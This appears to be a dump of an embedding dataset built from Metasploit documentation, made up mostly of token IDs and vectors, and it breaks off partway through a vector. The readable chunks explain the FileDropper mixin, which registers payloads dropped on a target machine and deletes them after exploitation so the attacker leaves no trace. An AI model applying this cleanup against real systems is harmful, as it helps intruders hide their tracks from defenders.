[ 101, 2006, 2023, 3931, 14321, 24076, 2361, 4118, 8873, 3709, 18981, 4842, 4666, 2378, 27686, 4118, 11368, 3022, 24759, 28100, 2038, 1037, 18801, 27686, 4118, 2008, 2003, 2467, 2170, 2043, 1996, 11336, 28790, 1010, 3251, 2009, 2003, 3144, 2030, 2025, 1012, 2023, 4118, 2064, 2022, 2058, 14615, 4181, 2011, 2151, 14184, 2000, 5587, 2037, 2219, 27686, 23964, 1012, 2005, 2742, 1010, 2023, 2453, 2022, 6179, 2000, 2404, 2070, 6764, 2067, 2006, 1996, 4539, 2044, 1996, 11336, 2018, 17159, 2068, 1012, 2178, 11967, 2052, 2022, 2000, 9239, 1996, 10906, 1999, 1037, 4773, 4646, 2008, 2020, 6310, 2011, 1996, 18077, 1012, 2023, 2003, 1996, 2157, 2173, 2000, 4550, 2477, 2039, 1012, 7705, 2993, 22164, 2023, 4118, 2000, 12532, 10087, 6593, 7264, 1010, 2655, 1996, 28213, 27686, 23964, 1010, 4385, 1012, 2070, 2060, 4666, 7076, 1010, 2107, 2004, 1996, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6406, 18981, 4842, 1006, 2156, 1996, 2279, 2930, 1007, 2030, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 1024, 1024, 17710, 20473, 2891, 1024, 1024, 7396, 1010, 2058, 15637, 2023, 4118, 2000, 5587, 2037, 2219, 27686, 3642, 1012, 2009, 2003, 5186, 2590, 2000, 2467, 2655, 3565, 1999, 2115, 27686, 4118, 2000, 2191, 2469, 7705, 1998, 2151, 2060, 4666, 7076, 4550, 2039, 2068, 11246, 2546, 7919, 1012, 2182, 2003, 2019, 2742, 2008, 9239, 2015, 1037, 9563, 5371, 2044, 2108, 17159, 2011, 1996, 11336, 1024, 13366, 27686, 4983, 2969, 1012, 9530, 2546, 1035, 4180, 1012, 9152, 2140, 1029, 4339, 1035, 5371, 1006, 2969, 1012, 9530, 2546, 1035, 5371, 1010, 2969, 1012, 9530, 2546, 1035, 4180, 1007, 2203, 3565, 2203, 2182, 2003, 2178, 2742, 1997, 1037, 27686, 4118, 2008, 3972, 12870, 2015, 1037, 5741, 21025, 2102, 22409, 1024, 13366, 27686, 3565, 2709, 4983, 2342, 1035, 27686, 1029, 6140, 1035, 3570, 1006, 1005, 9344, 2039, 1005, 1007, 24471, 2072, 1027, 3671, 4697, 1035, 24471, 2072, 1006, 2951, 23809, 2063, 1031, 1005, 5310, 18442, 1005, 1033, 1010, 2969, 1012, 16360, 2080, 1035, 2171, 1010, 1005, 1013, 10906, 1005, 1007, 20116, 12881, 1027, 2131, 1035, 20116, 12881, 1006, 24471, 2072, 1007, 24501, 1027, 4604, 1035, 5227, 1035, 1039, 5856, 1006, 1063, 1005, 4118, 1005, 1027, 1028, 1005, 2695, 1005, 1010, 1005, 24471, 2072, 1005, 1027, 1028, 3671, 4697, 1035, 24471, 2072, 1006, 2951, 23809, 2063, 1031, 1005, 4539, 9496, 1005, 1033, 1010, 24471, 2072, 1007, 1010, 1005, 14931, 18863, 1005, 1027, 1028, 1005, 4646, 1013, 1060, 1011, 7479, 1011, 2433, 1011, 24471, 7770, 16044, 2094, 1005, 1010, 1005, 13075, 2015, 1035, 2695, 1005, 1027, 1028, 1063, 1035, 20116, 12881, 1024, 20116, 12881, 1010, 2895, 1024, 1005, 3972, 12870, 1005, 1010, 16360, 2080, 1035, 2171, 1024, 2969, 1012, 16360, 2080, 1035, 2171, 1065, 1065, 1007, 4983, 24501, 8246, 1035, 2007, 1006, 4945, 1024, 1024, 4895, 16416, 7507, 3468, 1010, 1005, 4039, 2000, 3362, 1996, 10906, 3931, 1005, 1007, 2203, 4983, 24501, 1012, 3642, 1027, 1027, 22060, 8246, 1035, 2007, 1006, 4945, 1024, 1024, 9223, 2890, 22086, 1010, 1005, 3972, 12870, 22409, 4945, 1005, 1007, 2203, 6140, 1035, 3570, 1006, 1000, 22409, 1001, 1063, 2969, 1012, 16360, 2080, 1035, 2171, 1065, 17159, 1012, 1000, 1007, 9152, 2140 ]
metasploit
125.txt
0
end filedropper mixinin some exploitation scenarios such as local privilege escalation, command execution, write privilege attacks, sql injections, etc, it is very likely that you have to upload one or more malicious files in order to gain control of the target machine. well, a smart attacker shouldn ’ t leave anything behind, so if a module needs to drop something onto the file system, it ’ s important to remove it right after the purpose is served. and that is why we created the filedropper mixin. the filedropper mixin is a file manager that allows you to keep track of files, and then delete them when a session is created. to use it, first include the mixin : include msf : : exploit : : filedropper next, tell the filedropper mixin where the file is going to be after a session is created by using the register _ file _ for _ cleanup method. each file name should either be a full path or relative to the current working directory of the session. for example, if i want to upload a payload to the target machine ’ s remote path : c : \ windows \ system32 \ payload. exe, then my statement can be : register _ file _ for _ cleanup ( " c : \ \ windows \ \ system32 \ \ payload. exe " ) if my session ’ s current directory is already in c : \ windows \ system32 \, then you can : register _ file _ for _ cleanup ( " payload. exe " ) if you wish to register multiple files, you can also provide the file names as arguments : register _ file _ for _ cleanup ( " file _ 1. vbs ", " file _ 2. exe ", " file _ 1. conf " ) note that if your exploit module uses on _ new _ session, you are actually overriding filedropper ’ s on _ new _ session. [SEP]
[ 0.37827590107917786, 0.15663734078407288, 0.16779382526874542, 0.3981320559978485, -0.4918789863586426, -0.2807873785495758, -0.5475652813911438, 0.10298462957143784, -0.29171329736709595, 1.143105149269104, 0.20905545353889465, 0.286433607339859, 0.26289740204811096, -0.22029012441635132, -0.19477124512195587, 0.30921971797943115, 0.23566102981567383, -0.7291443347930908, -0.9680795669555664, -0.39469417929649353, 0.3934214413166046, -0.23025110363960266, -0.27410760521888733, -0.5805736184120178, -0.6723597645759583, 0.11558733880519867, -0.26440009474754333, -0.33769717812538147, 1.319801688194275, 0.8630154132843018, -0.2638636827468872, 0.7905778288841248, 0.0240772794932127, -0.7222599387168884, 0.12528352439403534, -0.2792116105556488, 0.4978853762149811, 0.36932268738746643, -0.35926300287246704, -0.7131671905517578, 0.1518714278936386, 0.44386401772499084, 0.9574751257896423, -0.772452175617218, -0.800614595413208, 0.06580764800310135, -0.1661512553691864, 0.5750550627708435, -0.05909329280257225, -0.09230554103851318, 0.167354017496109, 0.6817538738250732, -0.052285969257354736, -1.0263477563858032, 0.11537207663059235, 0.013486669398844242, -0.06397636234760284, 0.37972313165664673, 0.5317104458808899, -0.22201257944107056, -0.6616467237472534, 0.8126384019851685, -0.08669763058423996, -0.1547686904668808, 0.19617147743701935, 0.9360889792442322, -0.6643285751342773, -0.6933201551437378, -0.35494619607925415, -0.6026521325111389, 0.0018690107390284538, 0.18503031134605408, -0.6461980938911438, 0.08180870115756989, -0.7306299209594727, -0.24301674962043762, -0.07803110033273697, 0.13566724956035614, 0.2503218948841095, 1.1818872690200806, -0.019956979900598526, 0.7522138953208923, 0.24184966087341309, -0.2512963116168976, 0.008563141338527203, -0.06997308880090714, 0.48818737268447876, 0.20803479850292206, -0.08057517558336258, 0.11891206353902817, 0.11731348931789398, 0.3637676537036896, -0.0496138259768486, 0.3621652126312256, -0.301595002412796, 0.6064468622207642, -1.182747483253479, 0.7059383392333984, -0.08730761706829071, 0.21876093745231628, 0.5742993950843811, 0.7514923810958862, 0.3537600040435791, -0.04841621592640877, -0.4724729359149933, 0.2554437816143036, 0.5113190412521362, 0.2139187902212143, -1.2969987392425537, 0.0721449926495552, -0.19677409529685974, 0.007556446827948093, -0.25625377893447876, 0.1519775390625, -0.2802965044975281, -0.09903918206691742, 0.33468833565711975, -0.2636162340641022, -0.9864900708198547, 0.12804846465587616, 0.9740183353424072, -0.3816922605037689, 0.28312191367149353, -1.1111390590667725, -0.08606215566396713, -0.5796142220497131, -0.42559438943862915, 0.20203284919261932, -0.4602268934249878, 0.06232686713337898, 0.07910662889480591, -0.2823108732700348, -0.21090687811374664, 0.03103417344391346, -0.29243454337120056, 0.7974231243133545, -0.03898423910140991, 0.29405614733695984, 0.9965614676475525, -0.8447506427764893, 0.3916454017162323, 0.05436806008219719, 0.16062487661838531, 0.6858735084533691, -0.04886293783783913, 0.23465757071971893, -0.030178185552358627, 0.5848647952079773, -0.42312586307525635, 0.42227792739868164, -0.314044713973999, 0.15839457511901855, 0.32479995489120483, -0.0011236589634791017, 0.05613906681537628, -0.3532702624797821, -0.429676353931427, 0.37302348017692566, 0.3351426124572754, 0.7895739674568176, -0.6283009648323059, 0.4737294018268585, -0.18511490523815155, 0.012516878545284271, -0.0936768501996994, 0.5880336165428162, -0.4274584949016571, -0.19451743364334106, -0.24786770343780518, -0.07663559913635254, 0.8172189593315125, 0.03410841152071953, 0.26166003942489624, 0.22885361313819885, 0.8580165505409241, -0.017306549474596977, -0.34487420320510864, 0.2618522644042969, 0.1851387619972229, 0.33375284075737, -0.394370973110199, 0.30240944027900696, 0.3707337975502014, 0.4045957624912262, -0.3962033689022064, 0.23706366121768951, 0.2933400869369507, 0.2820366621017456, -0.7232798933982849, -0.17651499807834625, 0.377481609582901, 0.37521296739578247, -0.7298094630241394, 0.23895497620105743, 0.021919425576925278, -0.48227620124816895, -0.8806553483009338, 0.4581958055496216, 0.26744115352630615, -0.6128988265991211, -0.1643485426902771, -0.054749730974435806, -0.6286934614181519, 0.3624856472015381, -0.1284189224243164, -0.3551962077617645, 1.1192364692687988, 0.4568425118923187, -0.0796675980091095, 0.1414334774017334, 0.9859578013420105, -0.04346850514411926, -0.7561399936676025, -0.43189001083374023, 0.2746424078941345, -0.4593348503112793, 0.33731743693351746, -0.14862771332263947, 0.005546194035559893, 0.13581521809101105, -0.4658803343772888, 0.027308302000164986, 0.3160862326622009, 0.3806741237640381, -0.22453275322914124, 0.14441095292568207, -0.026439238339662552, 0.06982570141553879, -0.12417235225439072, 0.6112318634986877, 0.156728133559227, 0.11927273124456406, 0.039118941873311996, 0.9931045174598694, -0.27678585052490234, -0.41763532161712646, 0.3362886309623718, 0.4208090901374817, -0.7824140191078186, 0.21184998750686646, 0.23456314206123352, 0.9731780290603638, -0.4707310199737549, 1.0062401294708252, -0.3194332718849182, 0.05298261716961861, 0.2500106692314148, -0.17935501039028168, -0.37775474786758423, 0.7591792941093445, -0.9353323578834534, 0.9316517114639282, -0.2597130239009857, 0.1669526994228363, -0.261711984872818, 0.07879295200109482, -0.3865896165370941, 0.3259354531764984, -0.8282759785652161, -0.23665133118629456, 0.204414501786232, 0.342338889837265, -0.41605672240257263, -0.06223490834236145, -0.061571478843688965, 0.792726993560791, 0.2180081009864807, -0.2801460027694702, -0.5752596259117126, -0.418910413980484, 0.31791239976882935, 0.18161317706108093, -1.0113455057144165, -0.22506892681121826, -0.8576378226280212, -0.08857107907533646, 0.6357709169387817, -0.5885459184646606, 0.47908082604408264, -0.15100766718387604, 0.46255114674568176, 0.24722754955291748, 0.364199161529541, -0.021507009863853455, -0.15147145092487335, -0.05146900564432144, -1.2348475456237793, -0.46869707107543945, -0.3548703193664551, 0.49429577589035034, -0.5908282399177551, -0.6895384192466736, -0.2998768985271454, -0.004833371378481388, -0.13477608561515808, 0.2109811156988144, 0.7020958065986633, -0.6818323135375977, 0.3513963520526886, -0.1699986457824707, -0.481571227312088, 0.050908081233501434, -0.041260331869125366, -0.14346444606781006, -0.3167990446090698, -0.11537805199623108, 0.11587598919868469, -0.5226935744285583, 0.39042165875434875, 0.7537277340888977, -0.8252105712890625, 0.3240910768508911, -0.10941950231790543, 0.4744589924812317, -0.9508394598960876, 0.8632727265357971, 0.27778780460357666, -0.03933000937104225, -0.506838321685791, 0.05398073419928551, -0.06544335186481476, 0.2006848156452179, -0.2766276001930237, -0.49774572253227234, -0.5733230113983154, 0.5019707679748535, 0.20253519713878632, -1.050479531288147, 0.7181379795074463, -0.4597741961479187, 0.34649261832237244, -0.3194199800491333, -0.2755362093448639, -0.09984593838453293, -0.2767155170440674, 0.3385373651981354, -0.9042164087295532, -1.0129916667938232, -0.2260676771402359, 0.20081600546836853, -0.4484321177005768, -0.9392616152763367, 0.5449579954147339, 0.2424323409795761, 0.1680295467376709, -0.1714344620704651, 0.49038124084472656, -0.8352166414260864, -0.004556387662887573, -0.7276833057403564, 0.27840614318847656, 0.5069575905799866, -0.011611216701567173, 0.6214160323143005, 0.38387569785118103, 0.7911478877067566, -0.8840953707695007, 0.19474489986896515, 0.08859564363956451, -0.08349332213401794, 0.20374366641044617, 0.7448159456253052, -0.6341686248779297, -0.24056951701641083, -0.18883459270000458, -0.7087495923042297, 0.18496644496917725, 0.41719645261764526, 0.620290219783783, -0.6332143545150757, 0.22961723804473877, -0.3058609962463379, -0.18366125226020813, 0.4648599624633789, -0.5524192452430725, -0.21800962090492249, 0.23507672548294067, 0.11817844212055206, 0.9122357368469238, -0.5260388851165771, -0.2789231538772583, 0.08137720823287964, 0.5394779443740845, 0.41720670461654663, -0.43569737672805786, -0.14525631070137024, -1.0006695985794067, -0.003114325925707817, -0.5123969912528992, 0.3632403314113617, 0.0290013886988163, 0.0489535853266716, 0.20633739233016968, -0.1631380319595337, 0.0017543594585731626, -1.1365858316421509, 0.3762592077255249, 0.6919558048248291, 0.3853263258934021, 0.27537843585014343, 0.7017176151275635, 0.2791253626346588, 0.01782473549246788, 0.9406909346580505, -0.08211870491504669, 0.37877950072288513, -0.8235711455345154, 0.5905530452728271, -0.14390838146209717, -0.04609294980764389, -0.03156829625368118, 0.4080025851726532, -0.24058975279331207, 0.8576326966285706, 0.08901392668485641, 0.18725314736366272, -0.7702239751815796, 0.20660915970802307, 0.11823086440563202, -0.16164562106132507, -0.3293255567550659, -0.039386652410030365, -1.0646127462387085, 0.1049865186214447, 0.7003949284553528, -1.0037493705749512, 0.13632947206497192, -0.06160218268632889, 0.5878660678863525, 1.1954882144927979, -0.38887181878089905, -0.057454343885183334, -0.246132954955101, -0.39624401926994324, -0.6851775646209717, 0.7053977251052856, 0.5248338580131531, 0.014485764317214489, 0.07411234080791473, -0.5634757280349731, -0.481677770614624, -0.44395744800567627, 0.0880231037735939, -0.26162874698638916, -0.35607752203941345, 0.3691209852695465, 0.4653497040271759, 0.16107286512851715, 0.32538729906082153, -0.36788445711135864, 0.17369841039180756, -0.7527931928634644, -0.07654397934675217, -0.7777015566825867, 1.032302975654602, 0.2937709391117096, 0.4763411581516266, -0.14512363076210022, 0.3459681570529938, -0.22253446280956268, 0.15712514519691467, -0.32963916659355164, 0.006534966174513102, -1.0347338914871216, -0.4003388583660126, 0.059193700551986694, 0.11593567579984665, -0.2293023020029068, 0.6699860095977783, 0.478238046169281, -0.16867686808109283, 0.1741485744714737, 0.5367183089256287, -0.7703501582145691, 0.4070720970630646, -0.625139057636261, 0.05699784308671951, 0.33491790294647217, -0.1326851099729538, 0.06716494262218475, -0.7543738484382629, 1.4743753671646118, -0.02775411866605282, 0.02831181325018406, -0.9055858254432678, -0.8539270162582397, -0.03250909224152565, -0.0623830184340477, 0.4728313088417053, 0.27593159675598145, 0.02600676938891411, -0.035548362880945206, -0.10907354205846786, -0.7322395443916321, -0.5072788000106812, 0.21692156791687012, -0.3570517599582672, -0.24805960059165955, -0.1735640913248062, 0.3243213891983032, 0.3295564651489258, -0.08946539461612701, -0.14895404875278473, 0.5079282522201538, 0.14315159618854523, 0.43156152963638306, -0.545510470867157, 0.1995612382888794, 0.18300212919712067, 0.01858740672469139, -0.8610871434211731, 0.01653391867876053, -0.014479170553386211, 0.587388813495636, 0.333538681268692, -0.16704601049423218, 0.10191236436367035, -0.2644459009170532, -0.23267099261283875, 0.4198954403400421, 0.22051343321800232, -1.1248587369918823, -0.12112794071435928, 0.0950651541352272, -0.8580358624458313, 0.2715117037296295, 0.616715133190155, -0.6220126748085022, -1.1008021831512451, -0.3030717968940735, 0.4709870517253876, 0.1543867290019989, -0.0760359987616539, -0.1964961588382721, -0.5941066741943359, -0.6354005932807922, 0.49440139532089233, 0.4199666678905487, -0.9162642359733582, 0.0445975661277771, -0.36276718974113464, 0.025488289073109627, -0.4730891287326813, -0.22190824151039124, -0.4478159546852112, -0.5251388549804688, -0.08693773299455643, 0.9760030508041382, -0.2695714235305786, -0.08698689192533493, -0.008527619764208794, 0.03318934887647629, 0.37173500657081604, 0.27087149024009705, -0.9275886416435242, -0.1472359299659729, -0.5879629254341125, -0.1749570220708847, -0.2431941032409668, 0.11646732687950134, -0.9143885374069214, -0.011563236825168133, -0.03451388701796532, 0.436967670917511, -0.5488277077674866, 0.2205902636051178, -0.19846515357494354, 0.08391311764717102, 0.2392737716436386, -0.5681645274162292, 1.0098627805709839, -0.6874347925186157, 1.1716982126235962, 0.12291557341814041, 0.29861393570899963, 0.3467174470424652, 0.6399841904640198, -0.8703604340553284, -0.8303415775299072, 0.35075461864471436, 0.1282011717557907, 0.10911110788583755, 0.45259225368499756, -0.3290097713470459, 0.62541264295578, -0.7733807563781738, 0.3800528049468994, 0.8308292627334595, 0.25868719816207886, 0.08657602965831757, -0.26636743545532227, 0.46739745140075684, 0.3636667728424072, -0.40585994720458984, 0.34980979561805725, 0.38530227541923523, -0.19312886893749237, -0.18805880844593048, -0.3320581912994385, -0.9720745086669922, -0.19106034934520721, 0.26293763518333435, 1.0137416124343872, -0.7182735800743103, 0.6336212754249573, -0.3211595416069031, -0.18813975155353546, -0.09189015626907349, 0.7543490529060364, 0.17918649315834045, 0.2200109213590622, 0.2922825813293457, 0.07378672063350677, 0.5738981366157532, -0.14268964529037476, -0.43751099705696106, 0.04602442681789398, -0.44747984409332275, 0.6630507707595825, 0.14061181247234344, -0.3113964796066284, 0.5145990252494812, 0.0739547461271286, -0.5806073546409607, -0.49535492062568665, -0.5829349756240845, -0.1995624601840973, 0.36069169640541077, -0.15420609712600708, -0.3954428434371948, -0.5245883464813232, -0.18521146476268768, 0.5266550183296204, 0.5205487012863159, 0.23561866581439972, 0.24368754029273987, -0.5347405076026917, 0.20722918212413788, -0.20789240300655365, -0.13416734337806702, 0.7415597438812256, -0.08288373798131943, -0.2909982204437256, -0.7838151454925537, 0.42036473751068115, -0.46127018332481384, -0.041381143033504486, 0.05113225802779198, 0.5449413061141968, 0.523018479347229, 0.2847577929496765, -0.09674448519945145, 1.4200029373168945, -0.04273892566561699, 0.2023540735244751, -0.4950006604194641, -1.1587681770324707, -0.45647910237312317, -0.04920448362827301, -0.2927998900413513, -0.6048853993415833, 0.2413327544927597, -0.18531657755374908, 0.2952933609485626, -0.12673279643058777, 0.8279728889465332, 0.2208150029182434, -1.6165962219238281, 0.39604640007019043, -1.0467714071273804, 0.2727706730365753, -0.7559760808944702, 0.05740758031606674, 0.6716986894607544, -0.16319540143013, -0.033603038638830185, -0.14896871149539948, -0.8556473851203918, 0.14295952022075653, 0.15189726650714874, -0.5032010674476624, -0.8861372470855713, 0.3046858608722687, -0.6064572930335999, -0.5013125538825989, -0.2568356394767761, 0.6819911599159241, 0.37485426664352417, -0.811761736869812, -0.0658811628818512, -0.5902424454689026, -0.4195733368396759, 0.26227712631225586, -0.055078115314245224, -0.1570560783147812, 0.09315276145935059, -0.5458146333694458, 0.26665619015693665, 0.057727377861738205, -0.2091503143310547, 0.626336932182312, 0.7476429343223572, 0.044437602162361145, 0.4414590001106262, -0.23160579800605774, -0.049326859414577484, -0.2712361812591553, -0.42104628682136536, 0.5084607005119324, 0.08548446744680405, -0.7964969873428345, 0.4785517156124115, -0.3318745493888855, -0.3359850347042084, -0.14333432912826538, -0.894982635974884, 0.1176442950963974, 0.31890973448753357, 0.20762237906455994, 0.036568332463502884, 0.35932016372680664, -0.3611551821231842, 0.670852780342102, 0.2342231571674347, 0.82315993309021, 0.9304954409599304, 0.024579722434282303, -0.38265460729599, 0.2059106081724167, -0.2946180999279022, 0.8044608235359192, -0.014622213318943977, -0.08710672706365585, -0.139007568359375, 0.5578611493110657, 0.0020026538986712694, -0.07938145101070404, -0.5205889344215393, -0.7325426936149597, 0.26180627942085266, 1.075560212135315, 0.2463776171207428, -0.010291113518178463, 0.2568463087081909, 0.28902241587638855, 0.0905628427863121, -0.2695405185222626, -0.79306560754776, -0.2878451645374298, 0.46338528394699097, -0.49736496806144714, -0.28807732462882996, -0.70673668384552, -0.06506248563528061, 0.0013917103642597795, 0.6972991824150085, -0.19557125866413116, 0.10321084409952164, -0.230856791138649, 0.5437755584716797, 0.4926183521747589, 0.293231338262558, -0.30214470624923706, -0.3728092312812805, -0.06956224888563156, -0.177433580160141, -0.732519268989563, 0.28909608721733093, 0.8940885663032532, -0.660560667514801, -0.6711006164550781, -0.059084415435791016, -0.005460276268422604, -0.14864329993724823, 0.5500052571296692, -0.0831647589802742, -0.7435229420661926, -1.2106187343597412, -0.09029370546340942, 0.04315022751688957, 0.39453357458114624, -0.4231482446193695, 0.1982458382844925, -0.5680586695671082, -0.161097452044487, -0.2591785788536072, 0.38286200165748596, 0.5293052792549133, 0.4409627616405487, 0.5443164706230164, 0.47262945771217346, 0.955553412437439, -0.5391088724136353, 0.2252141833305359, -0.3674996793270111, 0.4673186242580414, 0.6411022543907166, 0.6755610704421997, -0.6776588559150696, 0.34000498056411743, 0.15777996182441711, 0.015886951237916946, -0.3987014889717102, 0.4632444679737091, -0.32466864585876465, -0.7587104439735413, 0.6797882318496704, 0.031812045723199844, -0.3474918305873871, -0.21072804927825928, -0.07042622566223145, 0.4914373755455017, -0.0939321517944336, 0.2989042103290558, -0.44395726919174194, -0.2236705869436264, -0.09404498338699341, -0.5006567239761353, -0.10320448875427246, 0.12259618937969208, -0.19712725281715393, 0.8656988739967346, -0.06654836982488632, -0.21959112584590912, 0.2526695430278778, 0.6571002006530762, 0.8385534882545471, -0.5528316497802734, -0.4871298372745514, 0.5321140885353088, 0.46072816848754883, -0.07458508759737015, 0.18157467246055603, -0.388474702835083, 0.48282933235168457, -0.25028666853904724, 0.4728492796421051, -0.8406850099563599, -0.1018538773059845, -0.295432448387146, 0.549777626991272, -0.1572272628545761, -0.7315467596054077, -0.32972481846809387, -1.025797963142395, 0.4418143928050995, -0.5986229777336121, 0.33279627561569214, 0.9895142912864685, -0.6151773929595947, -0.2924315929412842, 0.6515130996704102, -0.2733994424343109, 0.07579795271158218, -0.32872843742370605, 0.7342764735221863, 0.9338652491569519, 0.708616316318512, 0.39057889580726624, -0.31102603673934937, -0.22879020869731903, 0.3432205617427826, -0.10111194103956223, -0.39557579159736633, -0.3210216164588928, 0.021512296050786972, 0.23902343213558197, 0.23286029696464539, -0.6410576105117798, 0.3880304992198944, 0.7868289947509766, 0.1659368872642517, -0.7799049615859985, 0.48626723885536194, 0.08674363791942596, -1.0349855422973633, -0.37954747676849365, 0.7126412987709045, -0.5373935699462891, 0.3487309515476227, -0.10832266509532928, 0.083829365670681, -0.5066033601760864, -0.5289914608001709, -0.8956610560417175, 0.2815694808959961, 0.34110623598098755, 0.021006179973483086, -0.7853290438652039, -0.5455199480056763, -0.25642263889312744, 0.24512307345867157, -0.00040204220567829907, -0.021779708564281464, 0.6218140721321106, 0.5509350299835205, 0.0603649877011776, 0.06193460151553154, -0.3414697051048279, 0.18590296804904938, 0.8096820712089539, 0.828097403049469, -0.17898714542388916, 0.9045526385307312, 0.270721971988678, -1.137824535369873, 0.13268987834453583, 0.48901844024658203, 0.36369264125823975, 0.018343985080718994, -0.31310489773750305, -0.1963309496641159, 0.38599908351898193, -1.0046708583831787, -0.5023472309112549, -0.683449923992157, 1.0654473304748535, 0.23622599244117737, -0.5654064416885376, -0.3133634924888611, -0.13678361475467682, -1.0247821807861328, 0.15841899812221527, -0.8995164632797241, -0.09174483269453049, 0.30537471175193787, -0.21008723974227905, -0.004522460512816906, -0.7652878165245056, 4.410754203796387, 0.5938237905502319, 0.5317578911781311, 0.45898371934890747, 0.35329777002334595, 1.025315761566162, 0.8774003386497498, -0.13304056227207184, -0.33955541253089905, -0.9123209714889526, 0.4521207809448242, -0.6193873286247253, 0.18086199462413788, 0.44364988803863525, 0.36581987142562866, 0.3686637878417969, -0.4131515622138977, 0.2999347746372223, -0.015707623213529587, -0.8006781935691833, -1.0026466846466064, -0.15388675034046173, -0.1748335212469101, 0.8489487767219543, -0.4365144968032837, 0.4027318060398102, 0.4977528750896454, -0.5551652908325195, 0.6474578380584717, -0.49454882740974426, -0.04135787487030029, -0.4299720525741577, 0.3649818003177643, 0.14527498185634613, -0.3776315450668335, 0.666063666343689, 0.37320980429649353, 0.39782336354255676, -0.45755767822265625, -0.12043211609125137, 0.7221530675888062, -0.25444480776786804, -0.289029985666275, -0.2495025247335434, -0.03175147622823715, 0.6719088554382324, -0.09478390961885452, 0.07004476338624954, 0.3331564962863922, -0.7250173687934875, 1.1504756212234497, -0.1697738915681839, 0.4083302915096283, -0.3399467170238495, -1.0519160032272339, 0.8836168646812439, 0.0828927680850029, 0.1916629672050476, 0.16244398057460785, 0.2436392903327942, 0.17007650434970856, 0.17948611080646515, -0.3259328603744507, 0.7254981398582458, 0.017594359815120697, 0.11106020957231522, -0.010568312369287014, 0.2765403985977173, -0.20714454352855682, -0.6714091897010803, 0.3362032473087311, -0.3874441385269165, 0.09780112653970718, -1.0257091522216797, -0.44493815302848816, 0.11186632513999939, 0.1660691350698471, 0.2753397524356842, -0.10880687832832336, -0.1922653168439865, 0.3681950569152832, -0.22060289978981018, -0.4004165828227997, -0.13933676481246948, 0.3342430889606476, -0.09872232377529144, -0.2295999974012375, -0.16603194177150726, -0.21235767006874084, -0.23473133146762848, -0.14983996748924255, 0.3807356059551239, -0.004544633440673351, -0.3471134305000305, 0.7639051675796509 ]
[ 2203, 6406, 18981, 4842, 4666, 5498, 2078, 2070, 14427, 16820, 2107, 2004, 2334, 14293, 9686, 25015, 3508, 1010, 3094, 7781, 1010, 4339, 14293, 4491, 1010, 29296, 13341, 2015, 1010, 4385, 1010, 2009, 2003, 2200, 3497, 2008, 2017, 2031, 2000, 2039, 11066, 2028, 2030, 2062, 24391, 6764, 1999, 2344, 2000, 5114, 2491, 1997, 1996, 4539, 3698, 1012, 2092, 1010, 1037, 6047, 17346, 5807, 1521, 1056, 2681, 2505, 2369, 1010, 2061, 2065, 1037, 11336, 3791, 2000, 4530, 2242, 3031, 1996, 5371, 2291, 1010, 2009, 1521, 1055, 2590, 2000, 6366, 2009, 2157, 2044, 1996, 3800, 2003, 2366, 1012, 1998, 2008, 2003, 2339, 2057, 2580, 1996, 6406, 18981, 4842, 4666, 2378, 1012, 1996, 6406, 18981, 4842, 4666, 2378, 2003, 1037, 5371, 3208, 2008, 4473, 2017, 2000, 2562, 2650, 1997, 6764, 1010, 1998, 2059, 3972, 12870, 2068, 2043, 1037, 5219, 2003, 2580, 1012, 2000, 2224, 2009, 1010, 2034, 2421, 1996, 4666, 2378, 1024, 2421, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6406, 18981, 4842, 2279, 1010, 2425, 1996, 6406, 18981, 4842, 4666, 2378, 2073, 1996, 5371, 2003, 2183, 2000, 2022, 2044, 1037, 5219, 2003, 2580, 2011, 2478, 1996, 4236, 1035, 5371, 1035, 2005, 1035, 27686, 4118, 1012, 2169, 5371, 2171, 2323, 2593, 2022, 1037, 2440, 4130, 2030, 5816, 2000, 1996, 2783, 2551, 14176, 1997, 1996, 5219, 1012, 2005, 2742, 1010, 2065, 1045, 2215, 2000, 2039, 11066, 1037, 18093, 2000, 1996, 4539, 3698, 1521, 1055, 6556, 4130, 1024, 1039, 1024, 1032, 3645, 1032, 2291, 16703, 1032, 18093, 1012, 4654, 2063, 1010, 2059, 2026, 4861, 2064, 2022, 1024, 4236, 1035, 5371, 1035, 2005, 1035, 27686, 1006, 1000, 1039, 1024, 1032, 1032, 3645, 1032, 1032, 2291, 16703, 1032, 1032, 18093, 1012, 4654, 2063, 1000, 1007, 2065, 2026, 5219, 1521, 1055, 2783, 14176, 2003, 2525, 1999, 1039, 1024, 1032, 3645, 1032, 2291, 16703, 1032, 1010, 2059, 2017, 2064, 1024, 4236, 1035, 5371, 1035, 2005, 1035, 27686, 1006, 1000, 18093, 1012, 4654, 2063, 1000, 1007, 2065, 2017, 4299, 2000, 4236, 3674, 6764, 1010, 2017, 2064, 2036, 3073, 1996, 5371, 3415, 2004, 9918, 1024, 4236, 1035, 5371, 1035, 2005, 1035, 27686, 1006, 1000, 5371, 1035, 1015, 1012, 1058, 5910, 1000, 1010, 1000, 5371, 1035, 1016, 1012, 4654, 2063, 1000, 1010, 1000, 5371, 1035, 1015, 1012, 9530, 2546, 1000, 1007, 3602, 2008, 2065, 2115, 18077, 11336, 3594, 2006, 1035, 2047, 1035, 5219, 1010, 2017, 2024, 2941, 2058, 21930, 6406, 18981, 4842, 1521, 1055, 2006, 1035, 2047, 1035, 5219, 1012, 102 ]
metasploit
125.txt
1
[CLS] table of contents overview base64 support rc4 support xor supportback to top [SEP]
[ 0.37121161818504333, -0.34521061182022095, 0.6649056673049927, -0.5773308277130127, -0.17032481729984283, -0.44442492723464966, 0.304795503616333, -0.287588894367218, 0.29437822103500366, 1.2497291564941406, 0.48344725370407104, 0.18544550240039825, 0.5963433980941772, -0.5305821299552917, -0.05217423290014267, -0.1557481437921524, -0.07935609668493271, 0.2989736497402191, -0.3366253972053528, 0.3544943034648895, 0.15609881281852722, -0.36902040243148804, -0.867479145526886, -0.23059633374214172, -0.34177419543266296, 0.0730898380279541, 0.6730043292045593, 0.5264949202537537, 1.2281887531280518, 1.3562127351760864, -0.5590417385101318, -0.006063471548259258, 0.9279288053512573, -0.22659780085086823, -0.5983656048774719, -0.240993931889534, 0.19271859526634216, 0.20917163789272308, -0.2285253405570984, -1.2214710712432861, 0.1663697510957718, 0.22003230452537537, 0.309196412563324, -0.9394565224647522, -1.5308544635772705, -0.05470960959792137, 0.21495428681373596, 0.1615760624408722, -0.35413432121276855, -0.908916711807251, -0.3558219075202942, 0.8064574599266052, 0.12679332494735718, -0.33309975266456604, -0.025320379063487053, 0.9271582961082458, 0.027331722900271416, 